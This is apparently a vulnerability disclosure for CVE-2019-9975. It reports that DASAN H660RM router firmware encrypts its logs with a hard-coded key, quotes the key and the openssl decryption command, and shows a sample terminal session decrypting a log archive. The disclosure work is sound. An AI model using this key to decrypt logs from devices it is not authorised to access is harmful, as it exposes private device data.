syslog_tool.cgi on DASAN H660RM devices with firmware 1.03-0022 uses a hard-coded key for logs encryption

DASAN H660RM devices with firmware 1.03-0022 (and possibly other) uses a hard-coded key “dasanektks123” for logs encryption. Data stored using this key can be decrypted by anyone able to access this key.

This vulnerability was assigned CVE-2019-9975.


CWE-321: Use of Hard-coded Cryptographic Key weakness exists in syslog_tool.cgi:

ENC_PASSWORD="dasanektks123"
TMP_SYSLOG_FOLDER="/tmp/var/log/syslog/"
ENCRYPT_FILE="syslog_`date +%Y_%m_%d_%H_%M_%S`.tar.gz"
COMPRESS_FILE="syslog_compress.tar.gz"

Script syslog_tool.cgi uses OpenSSL’s aes-128-cbc encryption. Logs can be decrypted with command:

openssl enc -aes-128-cbc -d -k dasanektks123 -in encrypted.tar.gz -out cleartext.tar.gz

Decryption of logs follows.

kali ~/Downloads $ la
total 136K
drwxr-xr-x  2 user user 4.0K Mar  8 21:41 ./
drwx------ 23 user user 4.0K Mar  8 21:41 ../
-rw-r--r--  1 user user 127K Mar  8 20:12 syslog_1970_01_01_00_18_49.tar.gz
kali ~/Downloads $ file *
syslog_1970_01_01_00_18_49.tar.gz: openssl enc'd data with salted password
kali ~/Downloads $ openssl enc -aes-128-cbc -d -k dasanektks123 -in syslog_1970_01_01_00_18_49.tar.gz -out cleartext-syslog_1970_01_01_00_18_49.tar.gz
*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
kali ~/Downloads $ file *
cleartext-syslog_1970_01_01_00_18_49.tar.gz: gzip compressed data, max compression, from Unix, original size 735232
syslog_1970_01_01_00_18_49.tar.gz:           openssl enc'd data with salted password
kali ~/Downloads $ tar xvf cleartext-syslog_1970_01_01_00_18_49.tar.gz
data/log/
data/log/messages
kali ~/Downloads $ head data/log/messages
=== [REBOOT REASON] ==============================
POWERBOOT_BY_LOCAL e30ef88d
=== [LOG - BEGIN] ============================
=== [LOG - END] ==============================
Jan  1 00:01:08 kernel: klogd started: BusyBox v1.00 (2017.11.10-07:25+0000)
Jan  1 00:01:08 kernel: Error! phy_I2C_read return value = 0
Jan  1 00:01:08 kernel: u1DevAddr:0x51, u4WordAddr:0x70
Jan  1 00:01:08 kernel: _SIF_DrvRawRead:^M
Jan  1 00:01:08 kernel: Error sub-addr!
Jan  1 00:01:08 kernel: Error! phy_I2C_read return value = 0

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.